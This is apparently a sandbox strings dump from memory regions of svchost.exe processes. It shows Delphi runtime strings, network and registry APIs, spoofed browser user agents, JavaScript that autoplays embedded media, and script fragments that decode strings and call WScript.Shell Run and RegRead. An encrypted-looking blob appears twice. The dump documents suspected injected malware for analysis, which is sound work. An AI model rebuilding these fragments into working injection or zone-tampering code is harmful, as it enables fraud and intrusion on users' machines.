Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_896_rwx_00080000_000BC000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
wininet.dll
user32.dll
ntdll.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Kernel32.dll
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i  ){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i  ){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
HTTP/1.1
.length;
 =String.fromCharCode(parseInt(
.substr(
,2),16));
 =String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
winmm.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
?"?&?*?.?
11
3,313[3`3
6 7%7s7
56O6\6n6
4.434[4`4
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns  kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1  833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk  X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX
GcAQm81TXQ20gBQBfGzUUyITkVnuf6ZokztbVCBoXIkLEXZuX3K6Tq/kMmlUSJN5i4798 S07ThYVRcJlJzpssn8BeOAKxFAmxN1MmvqgFTEd8SeXkAI50Nm08Mdi1T794hz4w RqId TNhNtQGZ30DN sUxW8YTlNLHogIsZXdA3r0LqgrlFbvfeObL1d ABivgHLbuDjQUpeVdLeaduvmWAagE0ADmxsx0sqM50BuHv3pWRY5/ptsKVVf6AkKuMd7r6G Fj4ZXmY4m0RqIsfGJ9u3IqMibLkaZwIl8GKsFspvb wvDHgg0u6VI mDwAQ0LUOD7qwXiwAlBmlLTXTE4vCd7wHU0H/ouUKmbCrNoF 0tlR3keUXDn0NID1CuTV 53fQ3miPeMTKaw5qHOnV6Wq jpi5l6v/dmzxRVWC5Cff9Qebg6XJjREK4oUBaJd2pRVdeUiMuyoAc/3zyuLJfRuT 58D9KIKr v1pVPO81nj1MDj6FSQYrf54kItfRGMeGKEqrp2KW6jP8/UREYrqhYcv4pFx6wahmeWsOeKEh8xC4KdtQ3Xw7tj5P971uHekfA1YhlG2V4wabNQi44CjtQ2qPxnmupnPpaUBY51 VANO8XEgrQ76/8PXTaE8jnOa3orrrE3zQJj9gdxUs QeFaWK nlsitcqZpl2SV4OaAHOUqa1STXYhCBQkdiG31TIywBxkxDBThzdrfrH5aI0WPgLZt7keh2WNsh4kNsYW1Ww6faxrtnHmfDBj9FXN31Qur2/RJroZYq9Sie3TC3IUXAnQLSnhAgXmDJfkzW4o/MGSDQo//LAj1RHUgp0WEzhOv5Ys1Hp1L7Ns  kK2fuf4fJauYssZYdDBQd Jgd/xxzUOc2CiqnO DwwwG13y9PLBG1cRQozcwiHRPRV2eISfVXBgcj2Zj6D8YGiVzoScCI8 V wdNkhhBObIJQJyEcuzOYHu4lIZVKE0zWpMuN76N55TXtv9DKaBnfYz1EiDjo9eOf vtK2vzuGFWtb9M1HpuvertQtKHirxnsrPSLYBEejLt0BS1vtcXqnX7AXXCIizI/YycVNmyCWjUFtwPa5w2RI97w5wmx0pt8gqJvTm8zlRjUkavyJ7EVJZeTqDJtDir8aRJ3WTWzPfGizYxZM2uv/Aj437fW3xQfcmNXsfa6XqD2JII 8tiVEftxyWMzKaBktW/HwySeUxuU7AN gQtTpprzTnvVTr8PmWTao7eTUStsJ1vKIz5ZVXzUtzU4T1hG//GXgs1MIumW2irhAnMhExLvKEJucnazTprqmMDUuoMOZSLXv/U6QHABgGGIXHvtq0jBdl/1vj0vHf3XmI2jQc13qIS6ZYP z7H/XtMhVd3Ndz Or26Z4oWY oweJzP/Oa3l1ayVXaIYs3K7QoHt5vakSB4XJ9LXmctV01bUM/4jSuY5O7az8 u9BVRJ4Q4pCRU 82fVtZTIo7iy8zyrdx7St9QSadSLOX/UxqYVbEFG4OKrj6lUfoMm35az8Td19uSQNn8kVVfYJre60OmxhzJrF2tFOd Mbx7s5jcO1aL4 QuO6h0m 7zuT80TUeapOGmY4s3q4TCtJ88oX6leNS5n645pHAOpcUh7KX6oKol6y6fMNpWZpxMiUL8tnQIdsMZ93oWkhUAlyD6/wDi/y3YhLJdzxFrqSdDf7yNdNOmBQrVLnPLQIbAHi3EKhLsbWb8huds2y34ScNd0BHS0G2G4wJRby7adZ5kQD80QH0ZWNSsTjiQT8vMLNGIKk020fO5wQNsMlQlamhN04gdsLkhjKYMID0YvGGOC2PB5X8WtfOxhf6DTH0E/adetexYzVc9b0xieJw0PNJIwznajHmkrJBiI1aGBr1uU9QgbsbNVtgkFy4Qd4bqz71ZF1CT9ODQEo3NakWUrGGw3w9kCb/9ztCaZqVm4gzGJ7WUAY1EYSl9mm5xeFauRQkurR7tEIU X pb1WiVNYc4ZDnnIO8n9pcIBTmDKCuxljCn1IObMRS1Hx6Ou2EqvxsWhJgWst6V9PDM/QrCxX43hIe/Vgp0G971Qn2BpZP8cU1qvouvmC60GK7GqJYJhxIFziUqwFKrAGAFKRBumb1NEeZdxpHbe3Zvs01cE0a5KsqDN7Ap7xS1fm fDJPi79zXzOW7kkeQ59eM0hmso33wqe5lYti6bLHTvf9bBA67ljQzttgsnSHsG5MtfyEhdPTkS9ePfM7Q59T05luA5y1KlpcxY6yBc0VQhVAgG6tLeA4HPUkNts QdYPIXYswl/Dgns6ET7RjGfSy5jakzU3CIQDB3y6RIQXSzNrYPcd4QPfDMYN8pHCd9FWNBGcBDa6FPSaRljyYp9bEQwuPGPt6dWDSj3cwzF1UkmlysJvFIrsQ1YEHgUE38LO48mxRmeE6ZQDvlGMkhpywQJmu4e5vAkFoal7/ywz1g1WRRYDy7eS 33yhcbrXj5E3bvuqSjY jMrKMciNRhlkBzAZdMg1pCFZz41rUH epbJO3s5tiXayssXHT5DjihwM5CmlJI3OuJ1kZeqpPoJyZFgFBfGWxu5GmEupyxPwg1  833ILD4f6CXBKFWWJ9JwujqhvdgQK0OBIIrNhKrk8SA3X2l4451P974Vyvko2xSnZrPpvPSqKjjKT8Gsw nzWVSaPLDDBCt2OvVaDwSi2bPfPJcF20io1M/ uPHMFpIrkuH0cNqSEpUhI/vLddNDoNrMe2mfENdq6vK7vxlujmm8dEtgtzcnF03HNeM EA3czdIr0pylvmaQGDqOXf4MdLgoudWzTwEwMZTkjqrdB94a2qsalNOnlObnpaAQjddW6TnlfZ7DQ84Gxk0fdtTa0Dbj62rS6NvKVw4JRpOzeyOIcus30tdMfpOyqjK1KWX6dgL iGzrKS9SD30q6JuYZPrwlqffR5mWrV1M7eKA9oaw61X4xVCv4P85UWnK6wGINqGMB7Ttci1etNFgCBLqZ28Zmihmzdt7MYbmvoPLJo GgnbHxKTD2DevgtEF2jxS9byvrb fZHiAGfyOv3Wf/bFqXPkhXyuOQjWZ9tJ5zNiR70rLADHsEfifApUdCmOLQimQj6df4jgsH9ENqDlOKSr7RcXRYPzW30Zse0Qmdb8AXvpb1JAdPT73NRfUjiuBAPvRvhJARW4En3Q1Icr8cEFtRHOsLx1KfmvWM6 Gcsb5fezmKFLGNn/UQav7AAd4v78N2lbZ4CVOh7Xe55fc2CbxgxgEDQuF1/gSCnvTtYtwd2M4B/Ding6ZZa9U2MlMtcnt7HN 1hPZM Ux4B3n3nidCgztYEvlyKy30tdWFPhrTym9ECv3EfANPRAH5Z13O2R5SkGo7EGKpcB9SbPIJXzmtXwTcFjxxLx3zj1yu XYzCWbBCzPTJur9GIdRbEA0mI8xDU6F8noLfUwfrnvvGM5TXjOL r7JDTfGnWOGan NR0/ThvFkhVHQ7yC0t31OQtj9Hcq6AmbQlCAmY5XJpBOnmTPco3hO8uqHOjllv3ZP927jDYlYZvxBTQ7hLJcZNbfUohzHM/Mgt6y Hf11N7dNlCIgS d9iKR035oLCyf25xkIn5m9dEdBuFvlXiSwJ8MOIHXDtxG3IHerUQQ22xDpUfg5u1zrc4jGXJE4g8lFs3 gAMFa1wD89AGezWUcVhA2kUX6pDjOCv33McDLf7n/d/oHwuwl5S2q4XGLhyfFNs T3z1bFyy7MHiFt1Tolp0GwRDXYlPH5CD8W7EIqNXwjKNYh0kTezf8f4MjaAGDwaNSDfclIpOU4ZpT ccqWxFoeqvgCsWKsMyWSlLO2aEIICQWXEk0NTbbC0wVZkIDy XmYvpAa5H3XXZU3YDuYsmOpT7f2DlSj8GUXUUWsj8goRbNoyjcuie6OlPpWyo3vQdy/ORmdRUZJ3Q1gkSTUrhSK6lOJImAn5phb3qro WQoccDOBM/cyNBj7MA2Oz0d qVaPiNsAooUIMdb2v3BWUr9rQCUUTOOlyu9kUYix4aPGNTp lmD3M lWDHvCS1YspQK3jj6JrrIzjS8hovpXk1VM32Kuy7HIWphH gUg04W10YQE 1vOWBCBYuNC0wxIJCxRrXdGe/MdUnwYrq5DBjLazUwmUDm7a1OvTt8gjg3qWHBHJMyjjBwXyxbRWb9Iv F98VAZDZX61L2OhbMdkVk  X1pdbV0faBN3gFoRR/gp31CpMIJGqTqqxzHl PmhoqEOwVOInMh9FAM5DS8LC3CxGxZZK9oZZonnFALAOUmhocV7oQT/lmPBt0NrS12yRaaqdSxuqyLLAz8P2ebqz3P8cUaaxU6/R0IdzDLGNi1tCZSeXy5qoJKHCDjJOuzJL6jNPlLNiKF4nhNUbGIqkcR1bXgkCs8UCrQtvyGgbQkLcxmX7k4f KGo28pwD2qwlOAt2OIktOV1bwijm2qmZT2chywyMYGgX2UC6KN3zN1vShO9WcJhHo2ZiriX4d6l0sHNnnreaH7nbidheScoYCdKgeu KC218FnYGmldHBeyQGbJId4itioBO8qM6D8ZSPEWyT/kV8yRbRRZUNTPrfAs636MA3plxT21/eazTnTcYQ0fgRHtEc6blERNiA5dOZhqpfaBvlRklfn4o3Jztvao6On51RR9W1apk3cGUc2kv1TqT5BQYZZ6PSaxMMs7bxLjwdceVWRlyCBf7X0cIs9KzqTEKDKTLBeHSngPLRXu8yj0mZuYkULBsPGf5004LwZ0yDBrt4DnQs90VN8H9p/7aVJ4zW Fp5vSYZs3Hg TmntT6Ui9loHvaShGmx9Li4zhJjLd57p kb7 bGijQCP1Vo74sI8NyI9Kq0Y7nT0lqyQ6OEXld9Xs1KvJeA1moykaTVHtOK 7nhFZXrl4uDJw/EjEHvzYgicXVynGRHnH6dY/eUYHztU3Xa6auo7UakTnYboq5SQhrR2q4FiH0S6qFWe/usej4FTrEz/kfc/UB7DK8GKiwtYiocDZS71nLEk6BHKu5cGAsQ1rdPJvVrAG1fn Be1KOQ9CML4bvKzr B5rHo50A8lHpZEpzrQGE70xxnzrBw9oEtFr5hixcA1UkE8mZ6TxuEO97ZrHvaYhEPQROc7NFYLfvN4Ls Xo9fwhliBIEPlvOW6CFC7gCxaCQGxrg3qMLC0pyxKmXBAn1XVZ/sWNSeVhppuPNSk6dka7SVd V C06jg1DhrP9NvLtslNktXE qQxC5mFlZBjN9KSZmjNTwa 4ODdDVT6l87kOCyfaw/fYnqR/ jZKaTJNNqSjV/X Jf9tLWnLrnoe 2QwnSsHKhoRGKISt0cBUsXItPbYBY2AIxIOTji6nmyD1AFBU7G /DZGvDfDUxeTMpYpxZ1 BXDJHkTzq5McwQjfUCv7Z9D7nTqyj z/3l0nLyOsZIqm/9katu3rjlxAdNTZgEx/Zc0AIufCNZVbUHrxenFfvl9eUEByjTgazOYiIn4cR YdUBCpuYbmtUMH1vN0FIaZC/JWYHy55vYixDN402Ci5/vflQa6SHZFboiprMdVzjpUwCjVUz1lV/WH2IHje/SGys9//aznjD16aH8M1LYfnmsfU50ZcAT3AskGeF4Hn Dq2PhFcniFgFniWLsQTPqacsSRuU2fT5fENBrZ02ybC5hTPZkVOldfUcoQC 6jFKNtvLisdViqnEn6ql0WsNCeRTA6QtwPh50ZJVYcw9iRNgwy09r4Ieu0rcl9r2QvZ K8v4Hhb5iGRlEY0sOj2rM54ZdDDO52xOJ5Hdht7NkFQet0CkL 8kVpUuNiYQfatX/wE6AHBZ/qlaGQLPAuxcQrR4yxc7ND6Uo6Qu26QAPLUPKJVXdeK0ZQ6AuFYCC Gksj5BSLrfTYvhGd2Y0P82eTgUzkBm6AkeVVQ/cpT xTC5w6jKde/sVn07 K/T/W 9ufdvqkYwM1adGHOUhyATQBwCGzJC4H8YtF/YZ/YC3olBlKuY8iHfjY16F6Udm/YWZ x7uWJLT7BuDMGOcxrskcVrV7iYeTH6uK2BwOTPbCFcN4iKwYZKvGoVC8B7SOfbmWT5bEKmLo1R3H0YvYKuP2x9n6YCrszz2TZKbg1m2ugxneto/5ZM8dTsE4ivOkllpOYcnflTY3oBqqAwpuRth0UrPyDzGwn9Z/J3KUrWgSGnqSEAm4Txx7YhUdawT6rBs=KQdZsrD1QhacXmQpPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX2
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

svchost.exe_896_rwx_01000000_00006000:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

svchost.exe_472_rwx_00080000_000BC000:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
wininet.dll
user32.dll
ntdll.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
